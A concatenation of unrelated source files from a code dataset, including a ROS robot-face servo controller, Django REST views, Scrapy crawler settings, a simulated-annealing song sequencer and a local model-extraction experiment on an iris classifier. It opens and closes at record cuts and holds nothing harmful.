initPublishers(self):\n\t\tself.pubEyesBehavior = rospy.Publisher(\"/enableDefaultEyes\", Bool, queue_size = 10)\n\t\tself.pubLEye = rospy.Publisher(\"/moveLEye\", Point, queue_size = 10)\n\t\tself.pubREye = rospy.Publisher(\"/moveREye\", Point, queue_size = 10)\n\t\tself.pubSizePupils = rospy.Publisher(\"/size_pupils\", Float32, queue_size = 10)\n\n\tdef initSubscribers(self):\n\t\tself.subEmotions = rospy.Subscriber('/emotions', String, self.callbackEmotions)\n\t\tself.subStopTalk = rospy.Subscriber('/stopTalk', Bool, self.callbackStopTalk)\n\t\treturn\n\n\tdef 
initVariables(self):\n\t\tself.changeEmotions = False\n\t\tself.enableEyesBehavior = Bool()\n\t\tself.eyesPosition = Point()\n\t\tself.stopTalk = Bool()\n\t\tself.pupilSize = Float32()\n\t\tself.emotionsDict = {\n\t\t\"happy\": self.set_happy,\n\t\t\"sad\": self.set_sad,\n\t\t\"surprise\": self.set_surprise,\n\t\t\"angry\": self.set_angry,\n\t\t\"neutral\": self.set_neutral,\n\t\t\"demo\": self.demo,\n\t\t\"talk\": self.talk\n\t\t}\n\n\tdef set_servos(self):\n\t\t#mouth motors\n\t\tself.eyeledright = OnohatServo()\n\t\tself.eyeledleft = OnohatServo()\n\t\tself.mouth1 = OnohatServo()\n\t\tself.mouth2 = OnohatServo()\n\t\tself.mouth3 = OnohatServo()\n\n\t\t#eyeled\n\t\tself.eyeledright.set_motor_id(4)\n\t\tself.eyeledleft.set_motor_id(5)\n\t\tself.mouth1.set_motor_id(6)\n\t\tself.mouth2.set_motor_id(7)\n\t\tself.mouth3.set_motor_id(8)\n\n\t\t#set actuation ranges\n\t\tself.mouth1.set_actuation_range(min =1099, max = 1331, origin =1261)\n\t\tself.mouth2.set_actuation_range(min =799, max = 1301, origin =950)\n\t\tself.mouth3.set_actuation_range(min =899, max = 1501 , origin =1280)\n\t\tself.eyeledleft.set_actuation_range(min = 1199, max = 1851, origin =1450)\n\t\tself.eyeledright.set_actuation_range(min = 1049, max = 1651, origin =1420)\n\n\t\t#set origin position\n\t\tself.set_neutral()\n\n\tdef activate_mosfet(self, val):\n\t\trospy.wait_for_service('/onohat_controller/torque_enable')\n\t\tserviceTorque = rospy.ServiceProxy('/onohat_controller/torque_enable', EnablePcaPower)\n\t\ttry:\n\t\t\tserviceResponse = serviceTorque(val)\n\t\t\treturn serviceResponse.result\n\t\texcept rospy.ServiceException as exc:\n\t\t\trospy.logwarn(\"[%s] Service did not process request: \" + str(exc), self.name)\n\t\treturn\n\n\tdef eyes(self, x, y, pupilSize):\n\t\tself.enableEyesBehavior.data = False\n\t\tself.pubEyesBehavior.publish(self.enableEyesBehavior)\n\t\ttime.sleep(0.5)\n\t\tself.eyesPosition.x = x\n\t\tself.eyesPosition.y = y\n\t\tself.eyesPosition.z = 0\n\t\tself.pubLEye.publish(self.eyesPosition)\n\t\ttime.sleep(0.5)\n\t\tself.pupilSize.data = pupilSize\n\t\tself.pubSizePupils.publish(self.pupilSize)\n\t\tself.rate.sleep()\n\n\t#expressions\n\tdef set_happy(self):\n\t\tself.eyes(0, 8, 0.7)\n\t\tself.mouth1.set_position(command ={'value':1300})\n\t\tself.mouth2.set_position(command ={'value':1300})\n\t\tself.mouth3.set_position(command ={'value':900})\n\t\tself.eyeledleft.set_position(command ={'value':1300})\n\t\tself.eyeledright.set_position(command ={'value':1530})\n\n\tdef set_sad(self):\n\t\tself.eyes(0, -20, 0.4)\n\t\tself.mouth1.set_position(command ={'value':1100})\n\t\tself.mouth2.set_position(command ={'value':800})\n\t\tself.mouth3.set_position(command ={'value':1500})\n\t\tself.eyeledleft.set_position(command ={'value':1300})\n\t\tself.eyeledright.set_position(command ={'value':1530})\n\n\tdef set_surprise(self):\n\t\tself.eyes(0, 15, 0.3)\n\t\tself.mouth1.set_position(command ={'value':1330})\n\t\tself.mouth2.set_position(command ={'value':800})\n\t\tself.mouth3.set_position(command ={'value':1500})\n\t\tself.eyeledleft.set_position(command ={'value':1300})\n\t\tself.eyeledright.set_position(command ={'value':1530})\n\n\tdef set_angry(self):\n\t\tself.eyes(0, 0, 0.5)\n\t\tself.mouth1.set_position(command ={'value':1255})\n\t\tself.mouth2.set_position(command ={'value':800})\n\t\tself.mouth3.set_position(command ={'value':1500})\n\t\tself.eyeledleft.set_position(command ={'value':1800})\n\t\tself.eyeledright.set_position(command ={'value':1100})\n\n\tdef 
set_neutral(self):\n\t\tself.enableEyesBehavior.data = True\n\t\tself.pubEyesBehavior.publish(self.enableEyesBehavior)\n\t\tself.mouth1.set_origin_position()\n\t\tself.mouth2.set_origin_position()\n\t\tself.mouth3.set_origin_position()\n\t\tself.eyeledleft.set_origin_position()\n\t\tself.eyeledright.set_origin_position()\n\n\tdef talk(self):\n\t\tself.eyes(0, 8, 0.7)\n\t\tself.mouth2.set_position(command ={'value':950})\n\t\tself.mouth3.set_position(command ={'value':1300})\n\t\twhile not self.stopTalk:\n\t\t\tself.mouth1.set_position(command ={'value':1330})\n\t\t\ttime.sleep(0.2)\n\t\t\tself.mouth1.set_position(command ={'value':1300})\n\t\t\ttime.sleep(0.2)\n\n\tdef demo(self):\n\t\tprint(\"demo\")\n\t\ttime.sleep(2)\n\t\tself.set_happy()\n\t\ttime.sleep(2)\n\t\tself.set_sad()\n\t\ttime.sleep(2)\n\t\tself.set_angry()\n\t\ttime.sleep(2)\n\t\tself.set_surprise()\n\t\ttime.sleep(2)\n\t\tself.set_neutral()\n\t\ttime.sleep(2)\n\t\tself.talk()\n\n\tdef callbackEmotions(self, msg):\n\t\tself.emotion = msg.data\n\t\tself.changeEmotions = True\n\t\treturn\n\n\tdef callbackStopTalk(self, msg):\n\t\tself.stopTalk = msg.data\n\t\treturn\n\n\tdef main(self):\n\t\trospy.loginfo(\"[%s] Facemotor node started ok\", self.name)\n\t\tactive = self.activate_mosfet(True)\n\t\tif active:\n\t\t\twhile not (rospy.is_shutdown()):\n\t\t\t\tif self.changeEmotions:\n\t\t\t\t\tif self.emotion == \"talk\":\n\t\t\t\t\t\tself.stopTalk = False\n\t\t\t\t\tself.emotionsDict[self.emotion]()\n\t\t\t\t\tself.changeEmotions = False\n\t\t\tself.rate.sleep()\n\t\t#while not (rospy.is_shutdown()):\n\t\t#\tif self.changeEmotions:\n\t\t#\t\tself.emotionsDict[self.emotion]()\n\t\t#\t\tself.changeEmotions = False\n\t\t#\tself.rate.sleep()\n\t\treturn\n\n\nif __name__ == '__main__':\n\tfm = FaceMotor(\"motor_face_handler\")\n\tfm.set_servos()\n\tfm.main()\n","sub_path":"scripts/face_motor.py","file_name":"face_motor.py","file_ext":"py","file_size_in_byte":5903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"453898896","text":"from rest_framework import generics, views, permissions, status, mixins\nfrom rest_framework.response import Response\nfrom .serializers import *\nfrom .models import *\n\n\n# Portfolio List API\nclass PortfolioListAPI(generics.ListAPIView):\n serializer_class = PortfolioSerializer\n queryset = Portfolio.objects.all()\n\n\n# Portfolio Manager API\nclass PortfolioManagerAPI(generics.RetrieveUpdateDestroyAPIView, mixins.CreateModelMixin):\n serializer_class = PortfolioSerializer\n queryset = Portfolio.objects.all()\n permission_classes = (permissions.IsAdminUser, )\n\n def post(self, request, *args, **kwargs):\n return self.create(request, *args, **kwargs)\n\n\n# Team List API\nclass TeamListAPI(generics.ListAPIView):\n serializer_class = TeamSerializer\n queryset = Team.objects.all()\n\n\n# Team Manager API\nclass TeamManagerAPI(generics.RetrieveUpdateDestroyAPIView, mixins.CreateModelMixin):\n serializer_class = TeamSerializer\n queryset = Team.objects.all()\n permission_classes = (permissions.IsAdminUser, )\n\n def post(self, request, *args, **kwargs):\n return self.create(request, *args, **kwargs)\n\n\n# Post List API\nclass PostListAPI(generics.ListAPIView):\n serializer_class = PostSerializer\n queryset = Post.objects.all()\n\n\n# Post Manager API\nclass PostManagerAPI(generics.RetrieveUpdateDestroyAPIView, mixins.CreateModelMixin):\n serializer_class = PostSerializer\n queryset = Post.objects.all()\n permission_classes = (permissions.IsAdminUser, 
)\n\n def post(self, request, *args, **kwargs):\n return self.create(request, *args, **kwargs)\n","sub_path":"niulunxi/homepage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"307485644","text":"# File: d (Python 2.2)\n\nfrom pandac.PandaModules import *\nimport types\n\nclass Rope(NodePath):\n showRope = base.config.GetBool('show-rope', 1)\n \n def __init__(self, name = 'Rope'):\n self.ropeNode = RopeNode(name)\n self.curve = NurbsCurveEvaluator()\n self.ropeNode.setCurve(self.curve)\n NodePath.__init__(self, self.ropeNode)\n self.name = name\n\n \n def setup(self, order, verts, knots = None):\n self.order = order\n self.verts = verts\n self.knots = knots\n self.recompute()\n\n \n def recompute(self):\n if not (self.showRope):\n return None\n \n numVerts = len(self.verts)\n self.curve.reset(numVerts)\n self.curve.setOrder(self.order)\n for i in range(numVerts):\n (nodePath, point) = self.verts[i]\n if isinstance(point, types.TupleType):\n if len(point) >= 4:\n self.curve.setVertex(i, VBase4(point[0], point[1], point[2], point[3]))\n else:\n self.curve.setVertex(i, VBase3(point[0], point[1], point[2]))\n else:\n self.curve.setVertex(i, point)\n if nodePath:\n self.curve.setVertexSpace(i, nodePath)\n \n \n if self.knots != None:\n for i in range(len(self.knots)):\n self.curve.setKnot(i, self.knots[i])\n \n \n self.ropeNode.resetBound(self)\n\n \n def getPoints(self, numPts):\n result = self.curve.evaluate(self)\n ropePts = []\n for i in range(numPts):\n pt = Point3()\n result.evalPoint(i / float(numPts - 1), pt)\n ropePts.append(pt)\n \n return ropePts\n\n\n","sub_path":"direct_notneeded/showutil/Rope.py","file_name":"Rope.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"625665819","text":"\nimport p_face_detect_train\n\nif __name__=='__main__':\n import sys\n try:\n train_data_fn=sys.argv[1]\n train_result_fn=sys.argv[2]\n\n except:\n train_data_fn='C:\\\\img_data\\\\MIT_face\\\\haar_featural\\\\'\n train_result_fn='C:\\\\img_data\\\\MIT_face\\\\train_inf\\\\'\n\n p_face_detect_train.train_all(train_data_fn,train_result_fn)\n\n \n","sub_path":"p_tem_face_detect.py","file_name":"p_tem_face_detect.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"573454150","text":"# -*- coding: utf-8 -*-\n\n# Scrapy settings for wish_crawler project\n#\n# For simplicity, this file contains only settings considered important or\n# commonly used. 
You can find more settings consulting the documentation:\n#\n# http://doc.scrapy.org/en/latest/topics/settings.html\n# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html\n# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html\n\nBOT_NAME = 'wish_crawler'\n\nSPIDER_MODULES = ['wish_crawler.spiders']\nNEWSPIDER_MODULE = 'wish_crawler.spiders'\nLOG_LEVEL = 'INFO'\nFEED_EXPORT_ENCODING = 'utf-8'\nFEED_EXPORTERS = {\n 'csv': 'wish_crawler.spiders.csv_item_exporter.WishCsvItemExporter',\n}\n\nFIELDS_TO_EXPORT = [\n 'name',\n 'url',\n 'rating',\n 'rating_count',\n 'seller',\n 'seller_rating',\n 'img_1',\n 'img_2',\n 'img_3',\n 'img_4',\n 'img_5',\n 'img_6',\n 'img_7',\n 'img_8',\n 'img_9',\n 'id',\n 'total_inventory',\n 'num_bought',\n 'brand',\n 'description',\n 'v1_price',\n 'v1_price_discount',\n 'v1_min_fullfillment_time',\n 'v1_max_fullfillment_time',\n 'v1_inventory',\n 'v1_size',\n 'v1_color',\n 'v1_shipping_fee',\n 'v2_price',\n 'v2_price_discount',\n 'v2_min_fullfillment_time',\n 'v2_max_fullfillment_time',\n 'v2_inventory',\n 'v2_size',\n 'v2_color',\n 'v2_shipping_fee',\n 'v3_price',\n 'v3_price_discount',\n 'v3_min_fullfillment_time',\n 'v3_max_fullfillment_time',\n 'v3_inventory',\n 'v3_size',\n 'v3_color',\n 'v3_shipping_fee',\n 'v4_price',\n 'v4_price_discount',\n 'v4_min_fullfillment_time',\n 'v4_max_fullfillment_time',\n 'v4_inventory',\n 'v4_size',\n 'v4_color',\n 'v4_shipping_fee',\n 'v5_price',\n 'v5_price_discount',\n 'v5_min_fullfillment_time',\n 'v5_max_fullfillment_time',\n 'v5_inventory',\n 'v5_size',\n 'v5_color',\n 'v5_shipping_fee',\n 'v6_price',\n 'v6_price_discount',\n 'v6_min_fullfillment_time',\n 'v6_max_fullfillment_time',\n 'v6_inventory',\n 'v6_size',\n 'v6_color',\n 'v6_shipping_fee',\n\n 'v7_price',\n 'v7_price_discount',\n 'v7_min_fullfillment_time',\n 'v7_max_fullfillment_time',\n 'v7_inventory',\n 'v7_size',\n 'v7_color',\n 'v7_shipping_fee',\n\n 'v8_price',\n 'v8_price_discount',\n 'v8_min_fullfillment_time',\n 'v8_max_fullfillment_time',\n 'v8_inventory',\n 'v8_size',\n 'v8_color',\n 'v8_shipping_fee',\n\n 'v9_price',\n 'v9_price_discount',\n 'v9_min_fullfillment_time',\n 'v9_max_fullfillment_time',\n 'v9_inventory',\n 'v9_size',\n 'v9_color',\n 'v9_shipping_fee',\n\n 'v10_price',\n 'v10_price_discount',\n 'v10_min_fullfillment_time',\n 'v10_max_fullfillment_time',\n 'v10_inventory',\n 'v10_size',\n 'v10_color',\n 'v10_shipping_fee',\n\n 'v11_price',\n 'v11_price_discount',\n 'v11_min_fullfillment_time',\n 'v11_max_fullfillment_time',\n 'v11_inventory',\n 'v11_size',\n 'v11_color',\n 'v11_shipping_fee',\n\n 'v12_price',\n 'v12_price_discount',\n 'v12_min_fullfillment_time',\n 'v12_max_fullfillment_time',\n 'v12_inventory',\n 'v12_size',\n 'v12_color',\n 'v12_shipping_fee',\n\n 'v13_price',\n 'v13_price_discount',\n 'v13_min_fullfillment_time',\n 'v13_max_fullfillment_time',\n 'v13_inventory',\n 'v13_size',\n 'v13_color',\n 'v13_shipping_fee',\n\n 'v14_price',\n 'v14_price_discount',\n 'v14_min_fullfillment_time',\n 'v14_max_fullfillment_time',\n 'v14_inventory',\n 'v14_size',\n 'v14_color',\n 'v14_shipping_fee',\n\n 'v15_price',\n 'v15_price_discount',\n 'v15_min_fullfillment_time',\n 'v15_max_fullfillment_time',\n 'v15_inventory',\n 'v15_size',\n 'v15_color',\n 'v15_shipping_fee'\n]\n\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\n#USER_AGENT = 'wish_crawler (+http://www.yourdomain.com)'\n\n# Obey robots.txt rules\nROBOTSTXT_OBEY = True\n\n# Configure maximum concurrent requests 
performed by Scrapy (default: 16)\n#CONCURRENT_REQUESTS = 32\n\n# Configure a delay for requests for the same website (default: 0)\n# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay\n# See also autothrottle settings and docs\n#DOWNLOAD_DELAY = 3\n# The download delay setting will honor only one of:\n#CONCURRENT_REQUESTS_PER_DOMAIN = 16\n#CONCURRENT_REQUESTS_PER_IP = 16\n\n# Disable cookies (enabled by default)\n#COOKIES_ENABLED = False\n\n# Disable Telnet Console (enabled by default)\n#TELNETCONSOLE_ENABLED = False\n\n# Override the default request headers:\n#DEFAULT_REQUEST_HEADERS = {\n# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n# 'Accept-Language': 'en',\n#}\n\n# Enable or disable spider middlewares\n# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html\n#SPIDER_MIDDLEWARES = {\n# 'wish_crawler.middlewares.WishCrawlerSpiderMiddleware': 543,\n#}\n\n# Enable or disable downloader middlewares\n# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html\n#DOWNLOADER_MIDDLEWARES = {\n# 'wish_crawler.middlewares.MyCustomDownloaderMiddleware': 543,\n#}\n\n# Enable or disable extensions\n# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html\n#EXTENSIONS = {\n# 'scrapy.extensions.telnet.TelnetConsole': None,\n#}\n\n# Configure item pipelines\n# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html\n#ITEM_PIPELINES = {\n# 'wish_crawler.pipelines.WishCrawlerPipeline': 300,\n#}\n\n# Enable and configure the AutoThrottle extension (disabled by default)\n# See http://doc.scrapy.org/en/latest/topics/autothrottle.html\n#AUTOTHROTTLE_ENABLED = True\n# The initial download delay\n#AUTOTHROTTLE_START_DELAY = 5\n# The maximum download delay to be set in case of high latencies\n#AUTOTHROTTLE_MAX_DELAY = 60\n# The average number of requests Scrapy should be sending in parallel to\n# each remote server\n#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0\n# Enable showing throttling stats for every response received:\n#AUTOTHROTTLE_DEBUG = False\n\n# Enable and configure HTTP caching (disabled by default)\n# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings\n#HTTPCACHE_ENABLED = True\n#HTTPCACHE_EXPIRATION_SECS = 0\n#HTTPCACHE_DIR = 'httpcache'\n#HTTPCACHE_IGNORE_HTTP_CODES = []\n#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'\n","sub_path":"wish_crawler/wish_crawler/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"654157209","text":"# Problem: http://www.usaco.org/index.php?page=viewproblem2&cpid=737\n# IDK how to solve because I'm bad.\nimport sys\n\n\nsys.stdin = open(\"art.in\", 'r')\nsys.stdout = open('art.out', 'w')\n\nwl = int(input())\n\npainting = []\nfor i in range(wl-1):\n painting.append(list(map(int, input().split())))\n\n\n\nprint(...)\n","sub_path":"USACO Problems/Bronze/2017/open/Problem 3/modern_art.py","file_name":"modern_art.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"64061329","text":"import logging\nimport piradio.commons as commons\nfrom . 
import base\n\n\nclass ClockService(base.AsyncService):\n TIME_CHANGED_EVENT = 'time_changed'\n\n def __init__(self):\n super(ClockService, self).__init__(tick_interval=1.0)\n self.prev_timeofday = commons.timeofday()\n\n def timeofday(self):\n return self.prev_timeofday\n\n def tick(self):\n super(ClockService, self).tick()\n timeofday = commons.timeofday()\n if timeofday != self.prev_timeofday:\n logging.debug('ClockService: time changed to %s', timeofday)\n self.prev_timeofday = timeofday\n self.notify_subscribers(self.TIME_CHANGED_EVENT, timeofday)\n","sub_path":"piradio/services/clock.py","file_name":"clock.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"526587483","text":"#!/usr/bin/python3\nimport pandas as pd\nimport numpy as np\nimport sys, random\nfrom copy import deepcopy\nfrom decimal import Decimal\n\n\n\"\"\"\nUsage: python sequence.py <path_to_csv>\n\"\"\"\n\n\nclass SeqSample(object):\n\n def __init__(self, path):\n self.df = pd.read_csv(path)\n self.current = list(self.df.columns[1:-1])\n random.shuffle(self.current)\n\n\n def neighbor_move(self, num_moves=2):\n proposed = deepcopy(self.current)\n for i in range(0, num_moves):\n idx = range(len(self.current))\n i1, i2 = random.sample(idx, 2)\n proposed[i1], proposed[i2] = proposed[i2], proposed[i1]\n\n return proposed\n\n\n def score_sequence(self, sequence):\n score = 0\n idx = 0\n current = 'start'\n for song in sequence:\n nxt = sequence[idx]\n songscore = float(self.df[self.df['name']==nxt][current])\n score += songscore\n current = nxt\n idx += 1\n\n endscore = float(self.df[self.df['name']=='stop'][current])\n score += endscore\n\n return score\n\n\n def target(self, x):\n return np.exp(Decimal(x) / Decimal(self.temp))\n\n\n def accept(self, oldseq, newseq, t=1):\n old = self.score_sequence(oldseq)\n new = self.score_sequence(newseq)\n A = min(1, self.target(new - old))\n return random.uniform(0, 1) < A\n\n \n def main_loop(self, inner_i=100,\n start_moves=4, end_moves=1):\n temp_schedule = [20, 15, 10, 7, 5, 10, 5, 1, 5, 0.5, 0.1, 3, 1,\n 0.1, 0.05]\n outer_i = len(temp_schedule)\n\n moves_increment = (start_moves - end_moves) / (outer_i - 1)\n moves = start_moves\n print('Initial num. 
moves: {}'.format(moves))\n for temp in temp_schedule:\n self.temp = temp\n print('Current temp: {}'.format(self.temp))\n print('Number of neighbor moves: {}'.format(round(moves)))\n accepted = 0\n for j in range(0, inner_i):\n self.proposed = self.neighbor_move(num_moves=round(moves))\n if self.accept(self.current, self.proposed):\n accepted += 1\n self.current = self.proposed\n print('Acceptance rate this round: {}'.format(\n accepted / inner_i\n ))\n moves -= moves_increment\n print('Current sequence:')\n print(self.current)\n print('Current score: {}'.format(self.score_sequence(self.current)))\n print('-----------------------------------------')\n\n print('FINAL SEQUENCE:')\n print(self.current)\n\n\ndef main():\n sampler = SeqSample(sys.argv[1])\n sampler.main_loop()\n\nif __name__=='__main__':\n main()\n","sub_path":"sequence.py","file_name":"sequence.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"632567156","text":"import time\r\nfrom collections import Counter\r\n\r\nfrom sklearn.tree import DecisionTreeClassifier\r\n\r\nfrom iris.Stealer import Stealer\r\nfrom iris.Target import Target\r\nimport pandas as pd\r\nimport random\r\nimport numpy as np\r\nfrom sklearn.datasets import fetch_20newsgroups\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.metrics import accuracy_score\r\nimport scipy.sparse as scip\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.animation import FuncAnimation\r\n\r\nstep = 200\r\nerr_set_num = 70\r\nrgt_set_num = 70\r\n\r\ndef samples(data):\r\n # get 50 samples as random samples\r\n return random.sample(data, 50)\r\n\r\n# generate h0 and err_set, rgt_set\r\ndef prepare(target, stealer):\r\n #h0_train = stealer.pool[0:stealer.pool.shape[0]-1]\r\n h0_train = stealer.data[stealer.row : stealer.row + step]\r\n stealer.row = step\r\n target_pred_train = target.model.predict(h0_train)\r\n stealer.queries += step\r\n\r\n # train h0 by a small random dataset\r\n #h0_vectors = target.vectorizer.transform(h0_train)\r\n h0 = stealer.train_base_clf(h0_train, target_pred_train)\r\n stealer.models.append(h0)\r\n\r\n # test on training set and testing set\r\n h0_test = stealer.data[stealer.row : step + stealer.row]\r\n stealer.row += step\r\n h0_test = h0_test.reset_index(drop=True) # \"=\"\r\n target_pred_test = target.model.predict(h0_test)\r\n h0_pred = h0.predict(h0_test)\r\n print(\"testing on h0\", accuracy_score(target_pred_test, h0_pred))\r\n print(\"training on h0\", accuracy_score(target_pred_train, h0.predict(h0_train)))\r\n\r\n cols_name = target.test.columns.tolist()\r\n cols_name.append('target')\r\n stealer.cols_name = cols_name\r\n err_sample = pd.DataFrame(columns=cols_name)\r\n rgt_sample = pd.DataFrame(columns=cols_name)\r\n\r\n # pick error samples from pool as error_set0\r\n for i in range(len(target_pred_test)):\r\n if target_pred_test[i] != h0_pred[i]:\r\n x = h0_test.iloc[i].tolist()\r\n x.append(target_pred_test[i])\r\n err_sample.loc[len(err_sample)] = x\r\n else:\r\n x = h0_test.iloc[i].tolist()\r\n x.append(target_pred_test[i])\r\n rgt_sample.loc[len(rgt_sample)] = x\r\n #rgt_sample.append(h0_test.iloc[i].tolist().append(target_pred_test[i]))\r\n return err_sample, rgt_sample\r\n\r\n\r\ndef form_err_rgt_set(target, stealer, rd):\r\n add_new = 200\r\n test = stealer.data[stealer.row : stealer.row + add_new]\r\n test = test.reset_index(drop=True)\r\n stealer.row += add_new #update row\r\n # pick 300 err 
samples from file rd-1, rd-2 and rd-3\r\n err_frames = []\r\n rgt_frames = []\r\n j = rd - 1\r\n while j >= (rd - 3) and j >= 0:\r\n # err set\r\n err_data = pd.read_csv(\"err_set/err_set{}.csv\".format(j))\r\n if len(err_data)>=err_set_num:\r\n err_data = err_data.sample(err_set_num)\r\n err_frames.append(err_data)\r\n\r\n # rgt set\r\n rgt_data = pd.read_csv(\"rgt_set/rgt_set{}.csv\".format(j))\r\n if len(rgt_data)>= rgt_set_num:\r\n rgt_data = rgt_data.sample(rgt_set_num)\r\n rgt_frames.append(rgt_data)\r\n\r\n j -= 1\r\n\r\n return pd.concat(err_frames, ignore_index=True), pd.concat(rgt_frames, ignore_index=True)\r\n\r\n\r\ndef merge(err_set):\r\n chars = err_set[0].shape[1]\r\n row = len(err_set)\r\n dd1 = err_set[0]\r\n i = 1\r\n while i < len(err_set):\r\n if i == 1:\r\n dd = err_set[i]\r\n dd = scip.vstack([dd1, dd])\r\n else:\r\n dd1 = err_set[i]\r\n dd = scip.vstack([dd, dd1])\r\n i += 1\r\n return dd\r\n\r\ndef store(err_sample, rgt_sample, rd):\r\n err_sample.to_csv(\"err_set/err_set{}.csv\".format(rd), index=False)\r\n rgt_sample.to_csv(\"rgt_set/rgt_set{}.csv\".format(rd), index=False)\r\n\r\n\r\ndef show_pic(rd, accuracy):\r\n plt.xlabel('round')\r\n plt.ylabel('accuracy')\r\n plt.title('model stealing')\r\n plt.plot(rd, accuracy, \"b--\", linewidth=1)\r\n plt.show()\r\n time.sleep(3)\r\n plt.close()\r\n\r\ndef test_accu(stealer, target):\r\n pred = stealer.forest_predict(target.test, rows=len(target.test))\r\n print(pred)\r\n target_pred = target.model.predict(target.test)\r\n return accuracy_score(target_pred, pred), accuracy_score(target.test_lb, pred)\r\n\r\ndef update_clf(err_set, tar_lb, add_random, target, clf):\r\n add_random = add_random.tolist()\r\n lb = target.model.predict(target.vectorizer.transform(add_random)).tolist()\r\n err_set = err_set + add_random\r\n tar_lb = tar_lb + lb\r\n #clf = DecisionTreeClassifier(criterion='entropy', max_depth=10, random_state=60)\r\n clf.fit(target.vectorizer.transform(err_set), tar_lb)\r\n return clf\r\n\r\n\r\nif __name__ == '__main__':\r\n tar_type = \"XGB\"\r\n pro = 25\r\n print(\"type:{}, pro:{}, step:{}, errnum:{}, aux_num:{}\".\r\n format(tar_type, pro, step, err_set_num, rgt_set_num))\r\n target = Target(tar_type)\r\n stealer = Stealer(target, pro)\r\n # train tree0 and err_set\r\n err_sample, rgt_sample = prepare(target, stealer) #return dataframe\r\n rd = []\r\n accuracy1 = []\r\n accuracy2 = []\r\n i = 0\r\n pool_len = len(stealer.data)\r\n while stealer.row < (pool_len):\r\n if i >= 1:\r\n # store err_set and tar_lb in files\r\n err_sample, rgt_sample = form_err_rgt_set(target, stealer, i)\r\n\r\n err_data = err_sample.drop(['target'], axis=1)\r\n rgt_data = rgt_sample.drop(['target'], axis=1)\r\n err_label = err_sample['target'].tolist()\r\n rgt_label = rgt_sample['target'].tolist()\r\n frame = [err_data, rgt_data]\r\n both_data = pd.concat(frame)\r\n both_lb = err_label + rgt_label\r\n clf = stealer.train_base_clf(both_data, both_lb)\r\n\r\n add_random = stealer.data[stealer.row : stealer.row+step]\r\n stealer.row += step\r\n #clf = update_clf(err_set, tar_lb, add_random, target, clf)\r\n clf, err_data, err_label = stealer.active_learning(clf, add_random, target, both_data, both_lb)\r\n err_label = pd.DataFrame(err_label, columns=['target'])\r\n err_data = err_data.reset_index(drop=True)\r\n err_sample = pd.concat([err_data, err_label], axis=1)\r\n\r\n store(err_sample, rgt_sample, i)\r\n stealer.models.append(clf)\r\n accu1, accu2 = test_accu(stealer, target)\r\n\r\n print(\"-------------------------------round {}, {} {}, queries={}-----------------------------------\".format(i, accu1, accu2, stealer.queries))\r\n rd.append(stealer.queries)\r\n 
accuracy1.append(accu1)\r\n accuracy2.append(accu2)\r\n diff = abs(accuracy1[i] - accuracy1[i-1])\r\n print(\"diff {}\".format(diff))\r\n if i >= 1 and diff <= 0.05:\r\n step += 500\r\n print(\"expand step to {}\".format(step))\r\n i += 1\r\n plt.xlabel('queries')\r\n plt.ylabel('agreement')\r\n plt.title('{} extraction on iris-{}%'.format(tar_type, stealer.proportion))\r\n plt.plot(rd, accuracy1, \"b--\", linewidth=1)\r\n plt.show()\r\n\r\n plt.xlabel('queries')\r\n plt.ylabel('accuracy')\r\n plt.title('{} extraction on iris-{}%'.format(tar_type, stealer.proportion))\r\n plt.plot(rd, accuracy2, \"b--\", linewidth=1)\r\n plt.show()\r\n\r\n '''test aug_data'''\r\n s_aug_pred = stealer.forest_predict(stealer.train_aug, rows=len(stealer.train_aug))\r\n t_aug_pred = target.predict(stealer.train_aug)\r\n print(accuracy_score(s_aug_pred, t_aug_pred))\r\n","sub_path":"iris/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":7210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"220239640","text":"import pandas as pd\n\n#importing the file\nsales_data = pd.read_csv('datasets/sales_data.csv', parse_dates=True, index_col='InvoiceDate')\n\n#reviewing the file\n# print(sales_data.head())\n\n#looking with .info() method\n# print(sales_data.info())\n\n#use .loc accessor (slicing can also be used or just selecting the year or month etc)\nmorning_sale = sales_data.loc['2010-12-01 08:26:00', 'Description']\nprint(morning_sale)","sub_path":"Data Analysis/datetime/indexing_time_series.py","file_name":"indexing_time_series.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"140251025","text":"# Copyright (C) 2020 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>\n\n# pylint: disable=maybe-no-member, invalid-name\n\n\"\"\"Test import of commentable 